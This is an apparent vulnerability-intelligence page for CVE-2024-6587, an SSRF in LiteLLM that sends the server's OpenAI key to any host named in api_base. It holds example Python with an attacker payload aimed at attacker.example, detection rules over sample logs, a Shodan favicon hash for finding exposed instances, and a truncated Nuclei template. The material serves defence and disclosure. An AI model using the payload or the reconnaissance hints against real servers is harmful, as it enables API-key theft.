CVE-2024-6587
Published 2024-09-13
Priority P1 · 82 · high · CVSS 3.1 base score 7.5
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
ITW exploit · VulnCheck KEV
Exploited in the wild
EPSS: 36.95% (98.3rd percentile)
A Server-Side Request Forgery (SSRF) vulnerability exists in berriai/litellm version 1.38.10. This vulnerability allows users to specify the `api_base` parameter when making requests to `POST /chat/completions`, causing the application to send the request to the domain specified by `api_base`. This request includes the OpenAI API key. A malicious user can set the `api_base` to their own domain and intercept the OpenAI API key, leading to unauthorized access and potential misuse of the API key.
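The routing mistake the advisory describes, shown as a vulnerable request builder beside a hardened one. This is example code written for this page, not LiteLLM's own implementation: the function names, the configuration constants, the request dict shape and the attacker payload are all assumptions chosen for illustration.

```python
"""CVE-2024-6587 routing flaw, illustrated as a vulnerable and a hardened
upstream request builder. Example code for this page, not LiteLLM's own
implementation: names, config constants and request shape are assumptions."""
from urllib.parse import urlsplit

# Constructed configuration; the key is a placeholder, not a real credential.
UPSTREAM_API_BASE = "https://api.openai.com/v1"
UPSTREAM_API_KEY = "sk-constructed-example-key"
ALLOWED_UPSTREAM_HOSTS = frozenset({"api.openai.com"})


class UnsafeApiBase(ValueError):
    """Raised when a client-supplied api_base points outside the allowlist."""


def build_upstream_request_vulnerable(body: dict) -> dict:
    """Vulnerable pattern: whatever `api_base` the caller put in the JSON body
    becomes the upstream URL, and the server's OpenAI key is attached to it.
    A caller who sets api_base to their own host receives the Bearer token."""
    api_base = body.get("api_base", UPSTREAM_API_BASE)
    return {
        "url": api_base.rstrip("/") + "/chat/completions",
        "headers": {"Authorization": "Bearer " + UPSTREAM_API_KEY},
        "json": {k: v for k, v in body.items() if k != "api_base"},
    }


def build_upstream_request_hardened(body: dict, allowed_hosts=ALLOWED_UPSTREAM_HOSTS) -> dict:
    """Hardened pattern: the upstream credential is only attached when the
    destination host is one the operator configured. `urlsplit().hostname`
    is compared, so `https://api.openai.com@evil.example/` (userinfo trick)
    and `https://api.openai.com.evil.example/` are both rejected."""
    api_base = body.get("api_base", UPSTREAM_API_BASE)
    parts = urlsplit(api_base)
    if parts.scheme != "https" or parts.hostname not in allowed_hosts:
        raise UnsafeApiBase(f"refusing to send upstream credential to {api_base!r}")
    return {
        "url": api_base.rstrip("/") + "/chat/completions",
        "headers": {"Authorization": "Bearer " + UPSTREAM_API_KEY},
        "json": {k: v for k, v in body.items() if k != "api_base"},
    }


def destination_host(request: dict) -> str:
    """Host the built request would be sent to (shows where the key goes)."""
    return urlsplit(request["url"]).hostname or ""


# Constructed attacker payload in the shape the advisory describes.
ATTACK_BODY = {
    "model": "gpt-3.5-turbo",
    "messages": [{"role": "user", "content": "hi"}],
    "api_base": "https://attacker.example/v1",
}

if __name__ == "__main__":
    leaked = build_upstream_request_vulnerable(ATTACK_BODY)
    print("vulnerable: key sent to", destination_host(leaked))
    try:
        build_upstream_request_hardened(ATTACK_BODY)
    except UnsafeApiBase as exc:
        print("hardened:", exc)
```

The hardened variant compares the parsed hostname rather than doing a string prefix match on the URL, which is what defeats the userinfo and subdomain lookalikes noted in the docstring. Dropping the `api_base` key from the forwarded body is a separate choice: if your deployment never needs per-request upstream overrides, rejecting any request that carries the field at all is simpler and safer than an allowlist.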
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| berriai | berriai_litellm | >= unspecified < 1.44.9 | 1.44.9 |
| litellm | litellm | — | — |
| litellm | litellm | >= 0 < 1.44.8 | 1.44.8 |

The two LiteLLM sources disagree on the first fixed release (1.44.8 versus 1.44.9); upgrading to 1.44.9 or later satisfies both.

The affected list on this page also carries seven x.org ranges for xorg-server (2:1.20.13-1ubuntu1~20.04.15, 2:21.1.4-2ubuntu1.7~22.04.8, 2:1.18.4-0ubuntu0.12+esm9, 2:1.18.4-0ubuntu0.12+esm10, 2:1.19.6-1ubuntu4.15+esm4, 2:1.19.6-1ubuntu4.15+esm5) and xwayland (2:22.1.1-1ubuntu0.11). Those are Ubuntu package versions from USN-6587-1 and its regression follow-ups (CVE-2023-6816, CVE-2024-0229), pulled in because the notice number matches the "6587" in this CVE id; they are not LiteLLM affected versions.
Detection & IOCs (extracted from sources)
- Exploit payload: POST /chat/completions with a user-controlled `api_base` field in the JSON body pointing to an attacker-controlled domain. The server forwards the request, with the OpenAI API key in its Authorization: Bearer header, to that domain.
- Confirm exploitation by detecting an outbound HTTP request from the LiteLLM host to an attacker-controlled destination that carries an Authorization: Bearer header; that header holds the OpenAI API key being exfiltrated.
- Identify exposed LiteLLM instances via Shodan using the favicon hash 439373620.
- Monitor POST requests to /chat/completions whose JSON body contains an `api_base` key with an external or unexpected domain value; `api_base` is the SSRF trigger parameter.
- Alert on outbound HTTP requests from the LiteLLM server process to hosts not on an approved allowlist, especially those carrying an Authorization: Bearer header, as this indicates SSRF-based API key leakage.
- Caveat: the advisory text names LiteLLM 1.38.10 (the version the report was filed against), while the affected ranges above extend to every release before 1.44.8/1.44.9. Verify the deployed version before applying detection rules so patched instances do not raise false positives.
- Caveat: the Nuclei template uses an out-of-band interaction server (interactsh) to confirm exploitation. In environments without external egress the SSRF can still reach internal hosts but will not trigger the interactsh matcher; supplement it with internal network monitoring, for example the proxy host's own egress logs.
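The two detection signals above (an inbound `api_base` pointing off-allowlist, and an outbound Bearer-carrying request to a non-approved host), plus the no-egress caveat, as detection logic run over constructed sample log lines. This is example code written for this page, not a vendor or SIEM rule: the JSON log layout, the field names, the process name and the allowlist are assumptions about what a proxy access log and a host egress log might contain.

```python
"""Detection logic for CVE-2024-6587 run over constructed log lines.
Example code for this page, not a vendor rule: log layout, field names and
the allowlist are assumptions."""
import ipaddress
import json
from urllib.parse import urlsplit

ALLOWED_UPSTREAM_HOSTS = frozenset({"api.openai.com"})


def _host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def _is_internal(host: str) -> bool:
    """True for non-global IP literals (RFC 1918, loopback, link-local) and
    localhost: an api_base aimed there is the no-egress case that an
    interactsh-based out-of-band check never sees."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return host == "localhost"


def flag_inbound(access_log_lines):
    """Signal 1: POST /chat/completions whose body carries an api_base whose
    host is not an approved upstream. Returns (line_no, api_base, reason)."""
    hits = []
    for n, line in enumerate(access_log_lines, 1):
        rec = json.loads(line)
        if rec.get("method") != "POST" or rec.get("path") != "/chat/completions":
            continue
        api_base = rec.get("body", {}).get("api_base")
        if not api_base:
            continue
        host = _host_of(api_base)
        if host in ALLOWED_UPSTREAM_HOSTS:
            continue
        reason = "internal-target" if _is_internal(host) else "external-target"
        hits.append((n, api_base, reason))
    return hits


def flag_egress(egress_log_lines):
    """Signal 2: an outbound request from the proxy process to a host outside
    the allowlist that carries Authorization: Bearer (the upstream key leaving).
    Returns (line_no, destination_host)."""
    hits = []
    for n, line in enumerate(egress_log_lines, 1):
        rec = json.loads(line)
        if rec.get("process") != "litellm":
            continue
        host = _host_of(rec.get("url", ""))
        auth = rec.get("headers", {}).get("Authorization", "")
        if host not in ALLOWED_UPSTREAM_HOSTS and auth.startswith("Bearer "):
            hits.append((n, host))
    return hits


# Constructed sample records (not captured traffic). The key is a placeholder.
ACCESS_LOG = [
    json.dumps({"method": "POST", "path": "/chat/completions",
                "body": {"model": "gpt-3.5-turbo", "api_base": "https://attacker.example/v1"}}),
    json.dumps({"method": "POST", "path": "/chat/completions",
                "body": {"model": "gpt-3.5-turbo", "api_base": "http://10.0.0.5:8080/v1"}}),
    json.dumps({"method": "POST", "path": "/chat/completions",
                "body": {"model": "gpt-3.5-turbo", "api_base": "https://api.openai.com/v1"}}),
    json.dumps({"method": "POST", "path": "/chat/completions",
                "body": {"model": "gpt-3.5-turbo"}}),
    json.dumps({"method": "GET", "path": "/health", "body": {}}),
]
EGRESS_LOG = [
    json.dumps({"process": "litellm", "url": "https://api.openai.com/v1/chat/completions",
                "headers": {"Authorization": "Bearer sk-constructed"}}),
    json.dumps({"process": "litellm", "url": "https://attacker.example/v1/chat/completions",
                "headers": {"Authorization": "Bearer sk-constructed"}}),
    json.dumps({"process": "curl", "url": "https://example.org/", "headers": {}}),
]

if __name__ == "__main__":
    for hit in flag_inbound(ACCESS_LOG):
        print("inbound ", hit)
    for hit in flag_egress(EGRESS_LOG):
        print("egress  ", hit)
```

The inbound rule fires before any outbound connection exists, so it also covers the second caveat: line 2 of the sample targets 10.0.0.5, which an interactsh matcher would never report but which is still an SSRF toward an internal service. The egress rule is the higher-confidence signal because it sees the credential actually leaving; keep both, and treat an egress hit with no matching inbound hit as a sign that the request reached the proxy through a path your access log does not cover.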
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | 3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| osv | — | 9.8 | CRITICAL | — |
| vulncheck | — | 7.5 | HIGH | — |

The 9.8 attributed to OSV here matches the score on the mis-associated xorg-server entries below, not OSV's own LiteLLM entry, which is rated HIGH. The consistent rating for this CVE is 7.5: network-reachable, no privileges or user interaction, high confidentiality impact (the upstream API key), no integrity or availability impact.
OSV
LiteLLM Server-Side Request Forgery (SSRF) vulnerability
osv · 2024-09-13 · CVE-2024-6587 [HIGH]
Same description as the CVE text above.

GHSA
LiteLLM Server-Side Request Forgery (SSRF) vulnerability
ghsa · 2024-09-13 · CVE-2024-6587 [HIGH] · CWE-918
Same description as the CVE text above.
OSV (mismatched entries)
xorg-server, xwayland regression; xorg-server vulnerabilities
osv · 2024-01-22, 2024-01-30, 2024-02-01 · CVSS 9.8
These three Ubuntu entries share only the number 6587 with this CVE: they are USN-6587-1 for the X.Org X Server and its two follow-up notices (the 16.04 LTS / 18.04 LTS update and the regression fix), covering CVE-2023-6816, CVE-2024-0229 and further issues. They do not concern LiteLLM. Advisory text as it appears on the page:

USN-6587-1 fixed several vulnerabilities in X.Org. This update provides the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. The fix was incomplete, resulting in a possible regression; a later update fixes the problem.

Original advisory details:
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An attacker could possibly use this issue to cause the X Server to crash, obtain sensitive information, or execute arbitrary code. (CVE-2023-6816)
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled reattaching to a different master device. An attacker could use this issue to cause the X Server to crash, leading to a denial of service, or possibly execute arbitrary code. (CVE-2024-0229)
Olivier Fourdan and Donn Seeley discovered that
VulnCheck
LiteLLM Server-Side Request Forgery (SSRF) Vulnerability
vulncheck · 2024 · CVSS 7.5 · CVE-2024-6587 [HIGH]
LiteLLM is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability that exposes OpenAI API keys.
Affected: LiteLLM (vendor), LiteLLM (product)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: Shadowserver honeypot statistics for cve-2024-6587. The earliest of these dates (2024-08-22) precedes the CVE's 2024-09-13 publication, so attempts against internet-facing instances were already being observed before the identifier was public.
https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-22&host_type=src&vulnerability=cve-2024-6587
https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-25&host_type=src&vulnerability=cve-2024-6587
https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-26&host_type=src&vulnerability=cve-2024-6587
https://dashboard.shadowserver
No detection rules found.
Nuclei
LiteLLM - Server-Side Request Forgery
nuclei · CVSS 7.5 · CVE-2024-6587 [HIGH]
LiteLLM is vulnerable to Server-Side Request Forgery (SSRF), exposing OpenAI API keys.
Template (truncated in the source):
```yaml
id: CVE-2024-6587

info:
  name: LiteLLM - Server-Side Request Forgery
  author: pdresearch,iamnoooob,rootxharsh,lambdasawa
  severity: high
  description: |
    LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
  impact: |
    Attackers can exploit SSRF to send requests to arbitrary URLs with OpenAI API keys in the Authorization header, potentially exposing API credentials.
  remediation: |
    Update LiteLLM to the latest version that addresses the SSRF vulnerability in the chat/completions endpoint.
  reference:
    - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
    - https://cve.mitre.org/cgi-bin/cvename.cgi?na
```
GreyNoise
New SSRF Exploitation Surge Serves as a Reminder of 2019 Capital One Breach
blogs_greynoiseio · 2025-03-11
GreyNoise
NoiseLetter September 2024
blogs_greynoiseio